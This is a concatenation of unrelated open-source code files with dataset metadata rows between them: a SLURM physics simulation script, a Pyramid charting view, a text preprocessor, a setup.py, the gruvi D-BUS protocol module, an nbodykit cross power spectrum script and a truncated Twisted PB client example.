# elif toggleDict['Coupling'] == 'twophonon':
# innerdatapath = innerdatapath
# Params_List.append([sParams, cParams, innerdatapath])
# redo (mI, P, aIBi)
redo_Vals = [(2, 4.4, -5.0), (2, 4.6, -5.0), (2, 4.8, -5.0),
(1, 3.2, -2.0), (1, 3.4, -2.0), (1, 3.6, -2.0),
(1, 3.8, -2.0), (1, 3.9, -2.0), (1, 4.1, -5.0),
(1, 4.1, -2.0), (1, 4.2, -5.0), (1, 4.2, -2.0),
(1, 4.4, -5.0), (1, 4.6, -2.0), (1, 5.6, -10.0),
(1, 5.8, -10.0), (1, 6.0, -10.0)]
for tup in redo_Vals:
(mI, P, aIBi) = tup
sParams = [mI, mB, n0, gBB]
cParams = [P, aIBi]
if toggleDict['Location'] == 'home':
datapath = '/home/kis/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
elif toggleDict['Location'] == 'work':
datapath = '/media/kis/Storage/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
elif toggleDict['Location'] == 'cluster':
datapath = '/n/regal/demler_lab/kis/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
if toggleDict['Dynamics'] == 'real':
innerdatapath = datapath + '/redyn'
elif toggleDict['Dynamics'] == 'imaginary':
innerdatapath = datapath + '/imdyn'
if toggleDict['Grid'] == 'cartesian':
innerdatapath = innerdatapath + '_cart'
elif toggleDict['Grid'] == 'spherical':
innerdatapath = innerdatapath + '_spherical'
if toggleDict['Coupling'] == 'frohlich':
innerdatapath = innerdatapath + '_froh'
elif toggleDict['Coupling'] == 'twophonon':
innerdatapath = innerdatapath
Params_List.append([sParams, cParams, innerdatapath])
# # ---- COMPUTE DATA ON COMPUTER ----
# runstart = timer()
# for ind, Params in enumerate(Params_List):
# loopstart = timer()
# [sParams, cParams, innerdatapath] = Params_List[ind]
# [mI, mB, n0, gBB] = sParams
# [P, aIBi] = cParams
# dyncart_ds = pf_dynamic_cart.quenchDynamics_DataGeneration(cParams, gParams, sParams, toggleDict)
# dyncart_ds.to_netcdf(innerdatapath + '/P_{:.3f}_aIBi_{:.2f}.nc'.format(P, aIBi))
# loopend = timer()
# print('Index: {:d}, P: {:.2f}, aIBi: {:.2f} Time: {:.2f}'.format(ind, P, aIBi, loopend - loopstart))
# end = timer()
# print('Total Time: {:.2f}'.format(end - runstart))
# ---- COMPUTE DATA ON CLUSTER ----
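    # Each SLURM array task computes a single (mI, P, aIBi) entry of Params_List.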
runstart = timer()
taskCount = int(os.getenv('SLURM_ARRAY_TASK_COUNT'))
taskID = int(os.getenv('SLURM_ARRAY_TASK_ID'))
if(taskCount > len(Params_List)):
print('ERROR: TASK COUNT MISMATCH')
P = float('nan')
aIBi = float('nan')
sys.exit()
else:
[sParams, cParams, innerdatapath] = Params_List[taskID]
[mI, mB, n0, gBB] = sParams
[P, aIBi] = cParams
dyncart_ds = pf_dynamic_cart.quenchDynamics_DataGeneration(cParams, gParams, sParams, toggleDict)
dyncart_ds.to_netcdf(innerdatapath + '/P_{:.3f}_aIBi_{:.2f}.nc'.format(P, aIBi))
end = timer()
print('Task ID: {:d}, P: {:.2f}, aIBi: {:.2f} Time: {:.2f}'.format(taskID, P, aIBi, end - runstart))
| mit | 4,372,049,834,979,202,600 | 40.615385 | 173 | 0.545571 | false | 2.731262 | false | false | false |
lightbase/WSCacicNeo | wscacicneo/views/graficos.py | 1 | 6987 | __author__ = 'adley'
import requests
import json
import random
from wscacicneo.utils.utils import Utils
from pyramid.httpexceptions import HTTPFound
from wscacicneo.model import config_reports
from liblightbase.lbsearch.search import NullDocument
from pyramid.session import check_csrf_token
from wscacicneo.search.orgao import SearchOrgao
class Graficos():
def __init__(self, request):
"""
        Constructor method
        :param request: Request object
"""
self.request = request
self.usuario_autenticado = Utils.retorna_usuario_autenticado(
self.request.session.get('userid'))
def graficos_orgao(self):
if 'attr' in self.request.matchdict.keys():
attr = self.request.matchdict['attr']
else:
attr = 'softwarelist'
orgao = self.request.matchdict['nm_orgao']
data = dict()
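        # A single organization renders one chart (or every attribute at once
        # when attr is 'todos'); 'todos-orgaos' builds the same chart for each
        # registered organization instead.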
if orgao != 'todos-orgaos':
if attr not in ['softwarelist','todos']:
return self.graficos(orgao = orgao)
elif attr == 'todos':
for attrib in ['win32_physicalmemory', 'win32_bios', 'win32_diskdrive', 'operatingsystem', 'win32_processor']:
data[attrib] = self.graficos(attr=attrib)['data']
data['softwarelist'] = self.graficos_software(view_type='detailed')['data']
else:
return self.graficos_software(orgao)
else:
search = SearchOrgao()
orgaos = [org.nome for org in search.list_by_name()]
for org in orgaos:
if attr != 'softwarelist':
data[org] = self.graficos(orgao = org)['data']
else:
data[org] = self.graficos_software(org)['data']
title_chart = ''
        # Set the chart title based on "attr"
if attr == "win32_processor":
title_chart = "Gráfico de Processadores"
elif attr == "win32_diskdrive":
title_chart = "Gráfico de HD"
elif attr == "win32_bios":
title_chart = "Gráfico de BIOS"
elif attr == "win32_physicalmemory":
title_chart = "Gráfico de Memória"
elif attr == "operatingsystem":
title_chart = "Gráfico de Sistemas Operacionais"
elif attr == "softwarelist":
title_chart = "Gráfico de Softwares"
elif attr != 'todos':
title_chart = "Gráfico de "+attr
return {"data": data,
"usuario_autenticado": self.usuario_autenticado,
"title_chart": title_chart,
"orgao_nm": orgao,
"attr": attr
}
def graficos(self, orgao=None, attr=None):
        # Set the chart title based on "attr"
if attr is None:
attr = self.request.matchdict['attr']
if attr == "win32_processor":
title_chart = "Gráfico de Processadores"
elif attr == "win32_diskdrive":
title_chart = "Gráfico de HD"
elif attr == "win32_bios":
title_chart = "Gráfico de BIOS"
elif attr == "win32_physicalmemory":
title_chart = "Gráfico de Memória"
elif attr == "operatingsystem":
title_chart = "Gráfico de Sistemas Operacionais"
else:
title_chart = "Gráfico de "+attr
if orgao is None:
orgao_nm = self.request.matchdict['nm_orgao']
else:
orgao_nm = orgao
nm_orgao = Utils.format_name(orgao_nm)
reports_config = config_reports.ConfReports(nm_orgao)
get_base = reports_config.get_attribute(attr)
results = get_base.results
data = []
list_of_numbers = []
data.append(['Item', 'Quantidade'])
# color_list = ["#8B0000", "#191970", "#2F4F4F", "#006400", "#808000",
# "#696969", "#B8860B", "#FF8C00", "#2E8B57", "#228B22"]
# chosen_color = 0
for elm in results:
if isinstance(elm, NullDocument):
continue
parent = getattr(elm, attr)
item = getattr(parent, attr + '_item')
amount = getattr(parent, attr + '_amount')
data.append([item, int(amount)])
list_of_numbers.append([int(amount)])
            # Old code for the Charts JS library
# data.append({"label": item, "data": int(amount), "color": color_list[chosen_color]})
# chosen_color += 1
# if chosen_color >= len(color_list):
# chosen_color = 0
# if attr == "software":
# max_num = Utils.getMaxOfList(list_of_numbers)
return {"data": data,
"usuario_autenticado": self.usuario_autenticado,
"title_chart": title_chart,
"orgao_nm": orgao_nm,
"attr": attr
}
def graficos_software(self, orgao=None, view_type = None):
attr = 'softwarelist'
title_chart = "Gráfico de Softwares"
if view_type is None:
view_type = self.request.matchdict['view_type']
if orgao is None:
orgao_nm = self.request.matchdict['nm_orgao']
else:
orgao_nm = orgao
nm_orgao = Utils.format_name(orgao_nm)
reports_config = config_reports.ConfReports(nm_orgao)
get_base = reports_config.get_attribute(attr)
results = get_base.results
data = []
list_of_numbers = []
data.append(['Item', 'Quantidade'])
# color_list = ["#8B0000", "#191970", "#2F4F4F", "#006400", "#808000",
# "#696969", "#B8860B", "#FF8C00", "#2E8B57", "#228B22"]
# chosen_color = 0
for elm in results:
if isinstance(elm, NullDocument):
continue
parent = getattr(elm, attr)
item = getattr(parent, attr + '_item')
amount = getattr(parent, attr + '_amount')
data.append([item, int(amount)])
list_of_numbers.append([int(amount)])
            # Old code for the Charts JS library
# data.append({"label": item, "data": int(amount), "color": color_list[chosen_color]})
# chosen_color += 1
# if chosen_color >= len(color_list):
# chosen_color = 0
if view_type == 'simple':
data_dict = dict()
data.pop(0)
for a in data:
data_dict[a[0]]= a[1]
data_dict = Utils.group_data(data_dict)
data=list()
data.append(['Item', 'Quantidade'])
for a in data_dict.keys():
data.append([a, int(data_dict[a])])
#if attr == "software":
#max_num = Utils.getMaxOfList(list_of_numbers)
return {"data": data,
"usuario_autenticado": self.usuario_autenticado,
"title_chart": title_chart,
"orgao_nm": orgao_nm,
"attr": attr
} | gpl-2.0 | 6,287,621,518,878,857,000 | 36.853261 | 126 | 0.536617 | false | 3.573114 | true | false | false |
CodeLionX/CommentSearchEngine | cse/lang/Preprocessor.py | 1 | 1532 | class Preprocessor(object):
__tokenizer = None
__steps = []
def __init__(self, tokenizer, steps):
self.__tokenizer = tokenizer
self.__steps = steps
def processText(self, comment):
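        # Tokenize the comment, pair each token with its position, then run the
        # configured preprocessing steps over the (token, position) tuples.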
tokens = self.__tokenizer.tokenize(comment)
tokenTuple = [(token, position) for position, token in enumerate(tokens)]
###### which way is faster?
for step in self.__steps:
tokenTuple = step.processAll(tokenTuple)
######
"""
pTokenTuple = []
for token, position in tokenTuple:
pT = (token, position)
for step in self.__steps:
pT = step.process(pT)
if pT: pTokenTuple.append(pT)
tokenTuple = pTokenTuple
"""
###### which way is faster?
## doesn't make a huge difference:
"""
ncalls tottime percall cumtime percall filename:lineno(function)
first one:
81098 0.342 0.000 114.429 0.001 /vagrant/cse/lang/Preprocessor.py:12(processText)
81098 0.057 0.000 65.668 0.001 /vagrant/cse/lang/NltkStemmer.py:22(processAll)
compared to second one:
81098 2.708 0.000 119.330 0.001 /vagrant/cse/lang/Preprocessor.py:12(processText)
2955756 1.275 0.000 67.069 0.000 /vagrant/cse/lang/NltkStemmer.py:26(process)
--> only about 5 seconds difference in cumulative execution time for 81098 calls
"""
return tokenTuple
| mit | 4,829,856,591,023,380,000 | 34.627907 | 102 | 0.567885 | false | 3.709443 | false | false | false |
messense/stacktracer | setup.py | 1 | 1227 | #!/usr/bin/env python
from __future__ import with_statement
import os
from setuptools import setup
readme = 'README.md'
if os.path.exists('README.rst'):
readme = 'README.rst'
with open(readme) as f:
long_description = f.read()
setup(
name='stacktracer',
version='0.1.2',
author='messense',
author_email='messense@icloud.com',
url='https://github.com/messense/stacktracer',
keywords='stack, tracer, multi-threaded, threading',
description='Stack tracer for multi-threaded applications',
long_description=long_description,
py_modules=['stacktracer'],
install_requires=[
'pygments',
],
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: Implementation :: CPython',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities',
],
)
| mit | 9,144,691,725,418,073,000 | 30.461538 | 71 | 0.632437 | false | 4.216495 | false | false | false |
geertj/gruvi | lib/gruvi/dbus.py | 2 | 21739 | #
# This file is part of Gruvi. Gruvi is free software available under the
# terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2012-2017 the Gruvi authors. See the file "AUTHORS" for a
# complete list.
"""
The :mod:`gruvi.dbus` module implements a D-BUS client and server.
The implementation uses parts of the `txdbus
<https://github.com/cocagne/txdbus>`_ project. A cut down copy of txdbus,
containing only those parts needed by Gruvi, is available as ``gruvi.txdbus``.
You need this if you are providing a message handler (see below).
Both a client and a server/bus-side implementation are provided. The bus-side
implementation is very bare bones and apart from the "Hello" message it does
not implement any of the "org.freedesktop.DBus" interface. It also does not
implement any message routing. The server side is provided mostly for testing
purposes (but it could serve as the basis for a real D-BUS server).
The client side of a D-BUS connection is implemented by :class:`DbusClient` and
the server/bus-side by :class:`DbusServer`. Both implement a procedural
interface. Messages can be sent using e.g. :meth:`DbusClient.send_message` or
:meth:`DbusClient.call_method`. An object-oriented interface that represents
D-BUS objects as Python objects, like the one txdbus provides, is currently not
available. The procedural interface can be used as a basis for your own
object-oriented interface though.
To receive notifications or to respond to method calls, you need to provide a
*message handler* to the client or the server constructor. The signature of the
message handler is: ``message_handler(message, protocol)``. Here, the *message*
argument is an instance of ``gruvi.txdbus.DbusMessage``, and the
*protocol* will be the :class:`DbusProtocol` instance for the current
connection.
Message handlers run in their own fiber, which allows them to call into
switchpoints. There is one fiber for every connection.
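A message handler that answers a single method call might look like this (a
minimal sketch; the 'Echo' member name is made up and the call is assumed to
carry one string argument)::
  from gruvi import txdbus
  def message_handler(message, protocol):
      # 'Echo' is a hypothetical member name, used only for illustration.
      if isinstance(message, txdbus.MethodCallMessage) and message.member == 'Echo':
          reply = txdbus.MethodReturnMessage(message.serial, signature='s',
                                             body=[message.body[0]])
          protocol.send_message(reply)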
Usage example::
  client = gruvi.DbusClient()
  client.connect('session')
  result = client.call_method('org.freedesktop.DBus', '/org/freedesktop/DBus',
                              'org.freedesktop.DBus', 'ListNames')
  for name in result[0]:
      print('Name: {}'.format(name))
"""
from __future__ import absolute_import, print_function
import os
import struct
import binascii
import codecs
import functools
import six
import pyuv
from . import compat
from .hub import switchpoint, switch_back
from .util import delegate_method
from .sync import Event
from .transports import TransportError
from .protocols import ProtocolError, MessageProtocol
from .stream import Stream
from .endpoints import Client, Server
from .address import saddr
from .vendor import txdbus
__all__ = ['DbusError', 'DbusMethodCallError', 'DbusProtocol', 'DbusClient', 'DbusServer']
class DbusError(ProtocolError):
"""Exception that is raised in case of D-BUS protocol errors."""
class DbusMethodCallError(DbusError):
"""Exception that is raised when a error reply is received for a D-BUS
method call."""
def __init__(self, method, reply):
message = 'error calling {!r} method ({})'.format(method, reply.error_name)
super(DbusMethodCallError, self).__init__(message)
self._error = reply.error_name
self._args = tuple(reply.body) if reply.body else ()
@property
def error(self):
return self._error
@property
def args(self):
return self._args
def parse_dbus_address(address):
"""Parse a D-BUS address string into a list of addresses."""
if address == 'session':
address = os.environ.get('DBUS_SESSION_BUS_ADDRESS')
if not address:
raise ValueError('$DBUS_SESSION_BUS_ADDRESS not set')
elif address == 'system':
address = os.environ.get('DBUS_SYSTEM_BUS_ADDRESS',
'unix:path=/var/run/dbus/system_bus_socket')
addresses = []
for addr in address.split(';'):
p1 = addr.find(':')
if p1 == -1:
raise ValueError('illegal address string: {}'.format(addr))
kind = addr[:p1]
args = dict((kv.split('=') for kv in addr[p1+1:].split(',')))
if kind == 'unix':
if 'path' in args:
addr = args['path']
elif 'abstract' in args:
addr = '\0' + args['abstract']
else:
raise ValueError('require "path" or "abstract" for unix')
elif kind == 'tcp':
if 'host' not in args or 'port' not in args:
raise ValueError('require "host" and "port" for tcp')
addr = (args['host'], int(args['port']))
else:
raise ValueError('unknown transport: {}'.format(kind))
addresses.append(addr)
return addresses
class TxdbusAuthenticator(object):
"""A adapter to use the txdbus client and server authenticators with our
transports and protocols."""
# For testing, cookie_dir is set to a temporary path. Otherwise, txdbus
# uses ~/.dbus-keyrings as specified in the spec.
cookie_dir = None
def __init__(self, transport, server_side, server_guid=None):
self._transport = transport
self._server_side = server_side
if self._server_side:
self._authenticator = txdbus.BusAuthenticator(server_guid)
self._authenticator.authenticators['DBUS_COOKIE_SHA1'].keyring_dir = self.cookie_dir
else:
self._authenticator = txdbus.ClientAuthenticator()
self._authenticator.cookie_dir = self.cookie_dir
self._authenticator.beginAuthentication(self)
def sendAuthMessage(self, message):
# Called by the txdbus authenticators
message = message.encode('ascii') + b'\r\n'
self._transport.write(message)
@property
def _unix_creds(self):
# Used by txdbus.BusExternalAuthenticator
return self._transport.get_extra_info('unix_creds')
def handleAuthMessage(self, line):
# Called by our protocol
self._authenticator.handleAuthMessage(line)
def authenticationSucceeded(self):
"""Return whether the authentication succeeded."""
return self._authenticator.authenticationSucceeded()
def getMechanismName(self):
"""Return the authentication mechanism name."""
if self._server_side:
mech = self._authenticator.current_mech
return mech.getMechanismName() if mech else None
else:
return getattr(self._authenticator, 'authMech', None)
def getUserName(self):
"""Return the authenticated user name (server side)."""
if not self._server_side:
return
mech = self._authenticator.current_mech
return mech.getUserName() if mech else None
def getGUID(self):
"""Return the GUID of the authenticated server."""
return self._authenticator.getGUID()
def parse_dbus_header(header):
"""Parse a D-BUS header. Return the message size."""
if six.indexbytes(header, 0) == ord('l'):
endian = '<'
elif six.indexbytes(header, 0) == ord('B'):
endian = '>'
else:
raise ValueError('illegal endianness')
if not 1 <= six.indexbytes(header, 1) <= 4:
        raise ValueError('illegal message type')
if struct.unpack(endian + 'I', header[8:12])[0] == 0:
raise ValueError('illegal serial number')
harrlen = struct.unpack(endian + 'I', header[12:16])[0]
padlen = (8 - harrlen) % 8
bodylen = struct.unpack(endian + 'I', header[4:8])[0]
return 16 + harrlen + padlen + bodylen
def new_server_guid():
"""Return a new GUID for a server."""
return binascii.hexlify(os.urandom(16)).decode('ascii')
class DbusProtocol(MessageProtocol):
"""D-BUS Protocol."""
# According to the D-BUS spec the max message size is 128MB. However since
# we want to limited memory usage we are much more conservative here.
max_message_size = 128*1024
# Maximum size for an authentication line
max_line_size = 1000
_next_unique_name = 0
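    # Incremental parser states: the initial nul byte sent by the client
    # (server side only), the line-based authentication exchange, the fixed
    # 16-byte message header, then the variable-length message body.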
S_CREDS_BYTE, S_AUTHENTICATE, S_MESSAGE_HEADER, S_MESSAGE = range(4)
def __init__(self, message_handler=None, server_side=False, server_guid=None, timeout=None):
super(DbusProtocol, self).__init__(message_handler, timeout=timeout)
self._server_side = server_side
self._name_acquired = Event()
self._buffer = bytearray()
self._method_calls = {}
self._authenticator = None
if self._server_side:
self._server_guid = server_guid or new_server_guid()
self._unique_name = ':{}'.format(self._next_unique_name)
type(self)._next_unique_name += 1
else:
self._server_guid = None
self._unique_name = None
self._state = None
@property
def server_guid(self):
return self._server_guid
def connection_made(self, transport):
# Protocol callback
super(DbusProtocol, self).connection_made(transport)
# The client initiates by sending a '\0' byte, as per the D-BUS spec.
if self._server_side:
self._state = self.S_CREDS_BYTE
else:
self._state = self.S_AUTHENTICATE
self._transport.write(b'\0')
self._writer = Stream(transport, 'w')
self._authenticator = TxdbusAuthenticator(transport, self._server_side, self._server_guid)
self._message_size = 0
def connection_lost(self, exc):
# Protocol callback
super(DbusProtocol, self).connection_lost(exc)
if self._error is None:
self._error = TransportError('connection lost')
for notify in self._method_calls.values():
if isinstance(notify, switch_back):
notify.throw(self._error)
self._method_calls.clear()
self._name_acquired.set()
self._authenticator = None # break cycle
def on_creds_byte(self, byte):
if byte != 0:
self._error = DbusError('first byte needs to be zero')
return False
self._state = self.S_AUTHENTICATE
return True
def on_partial_auth_line(self, line):
if len(line) > self.max_line_size:
self._error = DbusError('auth line too long ({} bytes)'.format(len(line)))
return False
return True
def on_auth_line(self, line):
if not self.on_partial_auth_line(line):
return False
if line[-2:] != b'\r\n':
self._error = DbusError('auth line does not end with \\r\\n')
return False
try:
line = codecs.decode(line[:-2], 'ascii') # codecs.decode allows memoryview
except UnicodeDecodeError as e:
            self._error = DbusError('auth line contains non-ascii chars')
return False
try:
self._authenticator.handleAuthMessage(line)
except txdbus.DBusAuthenticationFailed as e:
self._error = DbusError('authentication failed: {!s}'.format(e))
return False
if self._authenticator.authenticationSucceeded():
if not self._server_side:
message = txdbus.MethodCallMessage('/org/freedesktop/DBus', 'Hello',
'org.freedesktop.DBus', 'org.freedesktop.DBus')
self._transport.write(message.rawMessage)
self._method_calls[message.serial] = self.on_hello_response
self._state = self.S_MESSAGE_HEADER
self._server_guid = self._authenticator.getGUID()
return True
def on_hello_response(self, message):
self._unique_name = message.body[0]
self._name_acquired.set()
def on_message_header(self, header):
try:
size = parse_dbus_header(header)
except ValueError:
self._error = DbusError('invalid message header')
return False
if size > self.max_message_size:
self._error = DbusError('message too large ({} bytes)'.format(size))
return False
self._message_size = size
self._state = self.S_MESSAGE
return True
def on_message(self, message):
try:
parsed = txdbus.parseMessage(message)
except (txdbus.MarshallingError, struct.error) as e:
self._error = DbusError('parseMessage() error: {!s}'.format(e))
return False
if self._server_side and not self._name_acquired.is_set():
if isinstance(parsed, txdbus.MethodCallMessage) \
and parsed.member == 'Hello' \
and parsed.path == '/org/freedesktop/DBus' \
and parsed.interface == 'org.freedesktop.DBus' \
and parsed.destination == 'org.freedesktop.DBus':
response = txdbus.MethodReturnMessage(parsed.serial, signature='s',
body=[self._unique_name])
self._name_acquired.set()
self._transport.write(response.rawMessage)
else:
self._error = DbusError('Hello method not called')
return False
elif isinstance(parsed, (txdbus.MethodReturnMessage, txdbus.ErrorMessage)) \
and getattr(parsed, 'reply_serial', 0) in self._method_calls:
notify = self._method_calls.pop(parsed.reply_serial)
notify(parsed)
elif self._dispatcher:
self._queue.put_nowait(parsed)
else:
mtype = type(parsed).__name__[:-7].lower()
info = ' {!r}'.format(getattr(parsed, 'member', getattr(parsed, 'error_name', '')))
self._log.warning('no handler, ignoring inbound {}{}', mtype, info)
self._state = self.S_MESSAGE_HEADER
return True
def prepend_buffer(self, buf):
if self._buffer:
self._buffer.extend(buf)
buf = self._buffer
self._buffer = bytearray()
return memoryview(buf)
def data_received(self, data):
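        # Protocol callback: run the received bytes through the state machine,
        # buffering partial auth lines, headers and message bodies across calls.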
view = memoryview(data)
offset = 0
while offset != len(data):
if self._state == self.S_CREDS_BYTE:
credsbyte = six.indexbytes(view, offset)
offset += 1
if not self.on_creds_byte(credsbyte):
break
if self._state == self.S_AUTHENTICATE:
pos = data.find(b'\n', offset)
if pos == -1:
self._buffer.extend(view[offset:])
self.on_partial_auth_line(self._buffer)
break
line = self.prepend_buffer(view[offset:pos+1])
offset = pos+1
if not self.on_auth_line(line):
break
if self._state == self.S_MESSAGE_HEADER:
needbytes = 16 - len(self._buffer)
if len(data) - offset < needbytes:
self._buffer.extend(view[offset:])
break
header = self.prepend_buffer(view[offset:offset+needbytes])
if not self.on_message_header(header):
break
offset += len(header)
self._buffer.extend(header)
if self._state == self.S_MESSAGE:
needbytes = self._message_size - len(self._buffer)
if len(data) - offset < needbytes:
self._buffer.extend(view[offset:])
break
message = self.prepend_buffer(view[offset:offset+needbytes])
offset += needbytes
if not self.on_message(message):
break
self._maybe_pause_transport()
if self._error:
self._transport.close()
return
@switchpoint
def get_unique_name(self):
"""Return the unique name of the D-BUS connection."""
self._name_acquired.wait()
if self._error:
raise compat.saved_exc(self._error)
elif self._transport is None:
raise DbusError('not connected')
return self._unique_name
@switchpoint
def send_message(self, message):
"""Send a D-BUS message.
The *message* argument must be ``gruvi.txdbus.DbusMessage`` instance.
"""
if not isinstance(message, txdbus.DbusMessage):
            raise TypeError('message: expecting DbusMessage instance (got {!r})'
                            .format(type(message).__name__))
self._name_acquired.wait()
if self._error:
raise compat.saved_exc(self._error)
elif self._transport is None:
raise DbusError('not connected')
self._writer.write(message.rawMessage)
@switchpoint
def call_method(self, service, path, interface, method, signature=None,
args=None, no_reply=False, auto_start=False, timeout=-1):
"""Call a D-BUS method and wait for its reply.
This method calls the D-BUS method with name *method* that resides on
the object at bus address *service*, at path *path*, on interface
*interface*.
The *signature* and *args* are optional arguments that can be used to
add parameters to the method call. The signature is a D-BUS signature
string, while *args* must be a sequence of python types that can be
converted into the types specified by the signature. See the `D-BUS
specification
<http://dbus.freedesktop.org/doc/dbus-specification.html>`_ for a
reference on signature strings.
The flags *no_reply* and *auto_start* control the NO_REPLY_EXPECTED and
NO_AUTO_START flags on the D-BUS message.
The return value is the result of the D-BUS method call. This will be a
possibly empty sequence of values.
"""
message = txdbus.MethodCallMessage(path, method, interface=interface,
destination=service, signature=signature, body=args,
expectReply=not no_reply, autoStart=auto_start)
serial = message.serial
if timeout == -1:
timeout = self._timeout
try:
with switch_back(timeout) as switcher:
self._method_calls[serial] = switcher
self.send_message(message)
args, _ = self._hub.switch()
finally:
self._method_calls.pop(serial, None)
response = args[0]
assert response.reply_serial == serial
if isinstance(response, txdbus.ErrorMessage):
raise DbusMethodCallError(method, response)
args = tuple(response.body) if response.body else ()
return args
class DbusClient(Client):
"""A D-BUS client."""
def __init__(self, message_handler=None, timeout=30):
"""
The *message_handler* argument specifies an optional message handler.
The optional *timeout* argument specifies a default timeout for
protocol operations in seconds.
"""
protocol_factory = functools.partial(DbusProtocol, message_handler)
super(DbusClient, self).__init__(protocol_factory, timeout)
@switchpoint
def connect(self, address='session'):
"""Connect to *address* and wait until the connection is established.
The *address* argument must be a D-BUS server address, in the format
described in the D-BUS specification. It may also be one of the special
addresses ``'session'`` or ``'system'``, to connect to the D-BUS
session and system bus, respectively.
"""
if isinstance(address, six.string_types):
addresses = parse_dbus_address(address)
else:
addresses = [address]
for addr in addresses:
try:
super(DbusClient, self).connect(addr)
except pyuv.error.UVError:
continue
break
else:
raise DbusError('could not connect to any address')
# Wait for authentication to complete
self.get_unique_name()
protocol = Client.protocol
delegate_method(protocol, DbusProtocol.get_unique_name)
delegate_method(protocol, DbusProtocol.send_message)
delegate_method(protocol, DbusProtocol.call_method)
class DbusServer(Server):
"""A D-BUS server."""
def __init__(self, message_handler, timeout=30):
"""
The *message_handler* argument specifies the message handler.
The optional *timeout* argument specifies a default timeout for
protocol operations in seconds.
"""
protocol_factory = functools.partial(DbusProtocol, message_handler,
server_side=True)
super(DbusServer, self).__init__(protocol_factory, timeout)
@switchpoint
def listen(self, address='session'):
"""Start listening on *address* for new connection.
The *address* argument must be a D-BUS server address, in the format
described in the D-BUS specification. It may also be one of the special
addresses ``'session'`` or ``'system'``, to connect to the D-BUS
session and system bus, respectively.
"""
if isinstance(address, six.string_types):
addresses = parse_dbus_address(address)
else:
addresses = [address]
for addr in addresses:
try:
super(DbusServer, self).listen(addr)
except pyuv.error.UVError:
self._log.error('skipping address {}', saddr(addr))
| mit | -2,074,246,292,200,640,500 | 38.311031 | 98 | 0.609596 | false | 4.191863 | false | false | false |
rainwoodman/nbodykit | legacy/measurepower-mm.py | 3 | 3829 | from sys import argv
from sys import stdout
from sys import stderr
import logging
from argparse import ArgumentParser
parser = ArgumentParser("Parallel Cross Power Spectrum Calculator",
description=
"""Calculating cross matter power spectrum from two RunPB input files.
Output is written to stdout, in Mpc/h units.
        PowerSpectrum is the true one, without the (2 pi) ** 3 factor (differs from the Gadget/NGenIC internal convention).
""",
epilog=
"""
This script is written by Yu Feng, as part of `nbodykit'.
    The author would like to thank Marcel Schmittfull for the explanation of cic, shot noise, and k==0 plane errors.
"""
)
parser.add_argument("filename1",
help='basename of the input, only runpb format is supported in this script')
parser.add_argument("filename2",
help='basename of the input, only runpb format is supported in this script')
parser.add_argument("BoxSize", type=float,
help='BoxSize in Mpc/h')
parser.add_argument("Nmesh", type=int,
help='size of calculation mesh, recommend 2 * Ngrid')
parser.add_argument("output", help='write power to this file')
parser.add_argument("--binshift", type=float, default=0.0,
help='Shift the bin center by this fraction of the bin width. Default is 0.0. Marcel uses 0.5. this shall rarely be changed.' )
parser.add_argument("--bunchsize", type=int, default=1024*1024*4,
help='Number of particles to read per rank. A larger number usually means faster IO, but less memory for the FFT mesh')
parser.add_argument("--remove-cic", default='anisotropic', choices=["anisotropic","isotropic", "none"],
help='deconvolve cic, anisotropic is the proper way, see http://www.personal.psu.edu/duj13/dissertation/djeong_diss.pdf')
ns = parser.parse_args()
logging.basicConfig(level=logging.DEBUG)
import numpy
import nbodykit
from nbodykit.files import TPMSnapshotFile, read
from nbodykit.measurepower import measurepower
from pypm.particlemesh import ParticleMesh
from pypm.transfer import TransferFunction
from mpi4py import MPI
def paint_darkmatter(pm, filename, fileformat):
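    # Read particle positions in bunches, paint them onto the particle mesh and
    # return the total number of particles read across all MPI ranks.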
pm.real[:] = 0
Ntot = 0
for round, P in enumerate(read(pm.comm, filename, TPMSnapshotFile,
columns=['Position'], bunchsize=ns.bunchsize)):
P['Position'] *= ns.BoxSize
layout = pm.decompose(P['Position'])
tpos = layout.exchange(P['Position'])
#print tpos.shape
pm.paint(tpos)
npaint = pm.comm.allreduce(len(tpos), op=MPI.SUM)
nread = pm.comm.allreduce(len(P['Position']), op=MPI.SUM)
if pm.comm.rank == 0:
logging.info('round %d, npaint %d, nread %d' % (round, npaint, nread))
Ntot = Ntot + nread
return Ntot
def main():
if MPI.COMM_WORLD.rank == 0:
print 'importing done'
pm = ParticleMesh(ns.BoxSize, ns.Nmesh, dtype='f4')
Ntot = paint_darkmatter(pm, ns.filename1, TPMSnapshotFile)
if MPI.COMM_WORLD.rank == 0:
print 'painting done'
pm.r2c()
if MPI.COMM_WORLD.rank == 0:
print 'r2c done'
complex = pm.complex.copy()
numpy.conjugate(complex, out=complex)
Ntot = paint_darkmatter(pm, ns.filename2, TPMSnapshotFile)
if MPI.COMM_WORLD.rank == 0:
print 'painting 2 done'
pm.r2c()
if MPI.COMM_WORLD.rank == 0:
print 'r2c 2 done'
complex *= pm.complex
complex **= 0.5
if MPI.COMM_WORLD.rank == 0:
print 'cross done'
k, p = measurepower(pm, complex, ns.binshift, ns.remove_cic, 0)
if MPI.COMM_WORLD.rank == 0:
print 'measure'
if pm.comm.rank == 0:
if ns.output != '-':
myout = open(ns.output, 'w')
else:
myout = stdout
numpy.savetxt(myout, zip(k, p), '%0.7g')
myout.flush()
main()
| gpl-3.0 | 4,916,736,200,148,130,000 | 33.495495 | 135 | 0.653957 | false | 3.431004 | false | false | false |
tzewangdorje/SIPserv | Twisted-13.1.0/doc/core/howto/listings/pb/pb4client.py | 18 | 1794 | #!/usr/bin/env python
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.spread import pb
from twisted.internet import reactor
def main():
rootobj_def = pb.getObjectAt("localhost", 8800, 30)
rootobj_def.addCallbacks(got_rootobj)
obj2_def = getSomeObjectAt("localhost", 8800, 30, "two")
obj2_def.addCallbacks(got_obj2)
